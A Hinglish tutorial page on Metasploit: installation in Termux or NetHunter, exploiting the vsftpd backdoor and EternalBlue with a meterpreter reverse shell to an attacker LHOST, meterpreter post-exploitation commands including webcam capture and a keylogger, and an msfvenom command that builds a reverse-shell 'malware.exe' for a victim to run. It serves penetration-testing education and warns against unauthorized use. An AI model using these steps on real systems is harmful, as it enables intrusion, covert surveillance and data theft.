Metasploit Framework एक powerful open-source penetration testing tool है जो vulnerabilities को exploit करने में use होता है। इसमें 1000+ exploits, payloads और auxiliaries modules हैं जो security professionals के लिए essential हैं।
👉 यह penetration testing की दुनिया में सबसे popular framework है जो ethical hackers और security researchers use करते हैं।
🔥 Metasploit क्या-क्या कर सकता है
Vulnerability Exploits
Known vulnerabilities को exploit करना
Payload Generation
Malicious code create करना
Remote Access
Target system पर access पाना
Post-Exploitation
Access के बाद काम करना
Evading Defenses
Antivirus bypass करना
Security Testing
System security test करना
⚙️ Kali NetHunter / Termux में Metasploit install
System Update
apt updateSystem Upgrade
apt upgradeInstall Metasploit Framework
apt install metasploit-framework💻 Basic Commands (Use)
👉 Metasploit console (msfconsole) में commands use करो:
Open Metasploit Console
msfconsoleSearch Exploits
search vsftpdUse Specific Exploit
use exploit/unix/ftp/vsftpd_234_backdoorSet Target IP (RHOST)
set RHOST 192.168.1.100Run Exploit
exploit🎯 Real Example (Practical समझ)
1. Metasploit Console Start करो
msfconsole2. Vulnerability Search करो
search eternalblue3. Exploit Select करो
use exploit/windows/smb/ms17_010_eternalblue4. Target IP Set करो
set RHOST 10.0.2.155. Payload Select करो
set payload windows/x64/meterpreter/reverse_tcp6. Attacker IP Set करो (LHOST)
set LHOST 10.0.2.57. Exploit Run करो
exploit🧠 इसका मतलब:
Session Opened
Target पर access successful हुआ
Reverse Connection
Target ने attacker से connect किया
Shell Access
Commands use कर सकते हो
👉 Meterpreter session में ये commands use कर सकते हो:
sysinfo - System info देखोpwd - Current directoryls - Files list करोscreenshot - Screenshot लोwebcam_snap - Webcam capturekeyscan_start - Keylogger start🔧 Payload Generation (Reverse Shell)
Windows Reverse Shell Create करो
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.5 LPORT=4444 -f exe > malware.exePayload type
Reverse connection
Listener IP
Your system IP
Listener Port
Connection port
Format
File type (exe, sh, php)
👉 यह file को victim पर run कराने पर आपके system पर reverse connection आ जाएगी
Metasploit का unauthorized use सीरियस legal consequences हो सकते हैं
केवल authorized targets पर ही use करो:
- अपने lab environment (Virtual machines)
- Written permission वाले systems
- Educational practice environments
⚠️ यह tool केवल learning और ethical hacking के लिए है। Unauthorized access cyber crime है!
🧩 Related Tools
Searchsploit
Exploit codes search करने के लिए
BeEF
Browser-based exploitation के लिए
Metasploit = "Swiss Army Knife of Hacking"
यह सब कुछ एक जगह है — exploits, payloads, tools, और post-exploitation modules सब available हैं।